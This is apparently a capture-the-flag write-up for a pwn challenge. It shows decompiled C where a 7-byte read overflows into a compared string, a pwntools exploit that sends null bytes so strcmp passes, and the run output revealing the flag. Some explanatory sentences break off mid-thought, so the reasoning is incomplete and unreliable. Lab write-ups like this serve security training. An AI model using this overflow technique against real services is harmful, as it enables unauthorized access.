We start by downloading the source files.
We are given a binary
local_10 = *(long *)(in_FS_OFFSET + 0x28);
local_18 = 0x2073736170743377;
read(0,local_1e,7);
Our goal is that
iVar1 = strcmp(local_1e,(char *)&local_18);
if (iVar1 == 0) {
open_door();
}
Knowing that the first character of
We do this using python:
import pwn
import sys
def solve(r: pwn.remote):
r.recvuntil(">>")
r.sendline("\x003tpas\x00")
r.interactive()
def conn():
if len(sys.argv) != 3:
print(f"Usage: {sys.argv[0]} REMOTE remote-ip remote-port")
sys.exit(1)
r = pwn.remote(sys.argv[1], sys.argv[2])
return r
def main():
r = conn()
solve(r)
if __name__ == "__main__":
main()
Running this script gives us the flag:
python3 exploit.py 94.237.48.92 30796
[+] Opening connection to 94.237.48.92 on port 30796: Done
/home/pepe/ctf/htb/cyber-apocalypse-2024/pwn/writing-on-the-wall/exploit.py:6: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
r.recvuntil(">>")
/home/pepe/ctf/htb/cyber-apocalypse-2024/pwn/writing-on-the-wall/exploit.py:7: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
r.sendline("\x003tpas\x00")
[*] Switching to interactive mode
You managed to open the door! Here is the password for the next one: HTB{3v3ryth1ng_15_r34d4bl3}
[*] Got EOF while reading in interactive